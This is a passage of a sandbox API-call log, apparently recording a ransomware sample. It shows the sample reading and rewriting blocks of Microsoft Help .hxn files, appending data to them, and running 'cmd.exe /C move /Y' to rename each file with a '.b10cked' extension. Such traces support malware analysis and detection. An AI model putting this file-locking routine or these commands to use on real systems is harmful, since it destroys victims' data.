lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x6fc, dwThreadId=0xdcc)) returned 1 [0198.393] CloseHandle (hObject=0x1b4) returned 1 [0198.393] CloseHandle (hObject=0x120) returned 1 [0198.393] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.393] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT 
HELP\\") returned 0x22 [0198.393] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.393] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.393] ReleaseMutex (hMutex=0xf8) returned 1 [0198.393] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.393] ReleaseMutex (hMutex=0xf8) returned 1 [0198.393] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.393] ReleaseMutex (hMutex=0xf8) returned 1 [0198.393] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.393] ReleaseMutex (hMutex=0xf8) returned 1 [0198.393] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.400] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25518989107) returned 1 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.401] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x152 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x152 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.402] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.402] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.406] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | 
out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.406] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0198.406] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.407] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.407] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.407] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0198.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.ONENOTE.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0198.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.ONENOTE.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.ONENOTE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0198.410] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x152 [0198.411] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, 
lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.411] CloseHandle (hObject=0x120) returned 1 [0198.411] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN") returned 0x27 [0198.412] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.412] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd2c, dwThreadId=0x70c)) returned 1 [0198.579] CloseHandle (hObject=0x1b4) returned 1 [0198.579] CloseHandle (hObject=0x120) returned 1 [0198.579] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.579] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.579] CompareStringW (Locale=0x400, 
dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.579] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.579] ReleaseMutex (hMutex=0xf8) returned 1 [0198.579] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.579] ReleaseMutex (hMutex=0xf8) returned 1 [0198.579] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.579] ReleaseMutex (hMutex=0xf8) returned 1 [0198.579] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.579] ReleaseMutex (hMutex=0xf8) returned 1 [0198.579] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25536980031) returned 1 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.581] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.582] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.583] 
WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0198.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.584] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.584] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.584] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0198.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0198.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OUTLOOK.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0198.588] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x152 [0198.588] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.588] 
CloseHandle (hObject=0x120) returned 1 [0198.648] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN") returned 0x27 [0198.649] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.649] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 